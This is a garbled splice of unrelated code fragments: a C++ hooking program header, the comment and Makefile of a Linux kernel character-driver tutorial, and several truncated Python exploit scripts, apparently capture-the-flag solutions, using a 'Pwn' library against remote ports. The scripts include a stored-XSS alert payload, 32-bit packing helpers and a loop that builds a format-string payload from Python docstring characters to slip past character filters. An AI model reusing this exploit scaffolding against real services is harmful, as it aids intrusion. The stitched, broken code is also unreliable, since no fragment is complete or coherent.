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// SimpleHooking.cpp : Defines the entry point for the console application.
// Author : peternguyen
#include "stdafx.h"
#include <string>
#include <iostream>
#include <stdlib.h>
using namespace std;
* @file ebbchar.c
* @author Derek Molloy
* @date 7 April 2015
* @version 0.1
* @brief An introductory character driver to support the second article of my series on
* Linux loadable kernel module (LKM) development. This module maps to /dev/ebbchar and
* comes with a helper C program that can be run in Linux user space to communicate with
* this the LKM.
* @see for a full description and follow-up descriptions.
make -C /lib/modules/$(shell uname -r)/build/ M=$(PWD) modules
$(CC) testebbchar.c -o test
make -C /lib/modules/$(shell uname -r)/build/ M=$(PWD) clean
rm test
# Author : peternguyen
from Pwn import *
import re
p = Pwn(host='',port=20001,mode=1)
# p = Pwn(mode=1)
def exploit(**kargs):
alert("Stored XSS");
from Pwn import *
p = Pwn(mode=1)
def pA32(*args):
binary = ''
for arg in args:
binary += p.p32(arg)
return binary
import requests
import cPickle
import sys
import os
import hashlib
from base64 import b64encode, b64decode
import string
import json
import flask
# Author : peternguyen
from Pwn import *
p = Pwn(mode=1,host='',port=9999)
def alloc(name,type):
target = 'UOTp%I()<>S'
out = ''
for c in target:
found = False
for func_name in dir("")[::-1]:
doc = getattr(getattr("",func_name),"__doc__")
if c in doc:
idx = doc.find(c)
out += "{0.%s.__doc__[%d]}" % (func_name,idx)
# Author : peternguyen
from struct import *
from base64 import b64encode,b64decode
import requests
import re
import hashlib
import random